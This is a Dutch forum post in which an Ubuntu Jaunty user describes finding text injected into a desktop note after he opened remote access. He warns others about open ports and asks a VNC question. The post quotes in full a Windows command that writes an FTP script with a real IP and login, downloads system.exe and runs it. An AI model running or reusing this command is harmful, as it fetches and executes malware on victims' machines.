Hallo, gisteren gebeurde er iets grappigs met m'n Ubu Jaunty. Heb net de huiskamer-pc van 8.04 geüpdated (correct woord volgens Het Groene Boekje...) naar 9.04 Jaunty. Een scriptje dat ik op een andere pc draai om foto's op beide pc's te synchroniseren, wou echter niet werken: connection refused. Normaal, daar Ubuntu standaard goed zit dichtgetimmerd. Dus ik probeer het een en ander bij Beheer, connectievenster of zoiets (heb even de juiste Nederlandse benaming niet bij de hand) en vink wat dingen aan, zoals Toegang op afstand etc. Wou nog niet werken, dus ik dacht, daar kijk ik later nog wel eens naar, ik weet dat het eenvoudig is om die toegang op afstand te activeren, ik doe dat al jaren. Ik zet de pc in slaapstand.
Een paar uur later het ding weer aangezet. En?
Op het bureaublad opent opeens gedit met een klein bestandje dat daar al stond, een aantekening hoe je het afspelen van mp3's in Amarok in Jaunty moet activeren. Maar er was tekst aan toegevoegd, zie hier:
"installeren om mp3s te horen:
(sudo) libxine1-ffmpegcmd /c echo open 208.248.82.3 21 >> ik &echo user hycsju hyc7186 >> ik &echo binary >> ik &echo get system.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &system.exe &exit
echo You got owned"
Tot die /c is mijn tekst, de rest komt van elders/buiten! Krijgen we nou dan, dacht ik. Een zoektocht op internet naar "echo You got owned" informeert me dat enkele andere Ubuntu-gebruikers hier onlangs ook mee te maken hebben gehad, en ook Mac-gebruikers. Schijnt niet erg te zijn (mogelijk is dat anders op Windows...). In de tijd dat de pc uitstond/sliep, heb ik geen 'dubieuze' sites bezocht.
Vraag is dus hoe die tekst op mijn pc is gekomen. Duidelijk omdat ik teveel open heb gezet en er kennelijk bots/scripts/etc. zijn die permanent poorten scannen, op zoek naar fijne beschikbare services. Maar de in het script genoemde site, die volgens sommigen in Duitsland resideert, heb ik zeker niet bezocht.
Ergo, pas op met het openen van poorten/services, ook (juist!) al is het maar voor een uurtje...
Om hier nog een vraag aan te hangen: Jaunty zegt als ik Applicaties - Internet - Terminal Server Client aanklik om de desktop van mijn andere pc (8.04) te zien, zoiets als: vncviewer staat niet in uw pad, check installatie, verbinding mislukt. Staat wel in het menu en niet in een/mijn pad? Hoe ken dat?
Groet, Paul.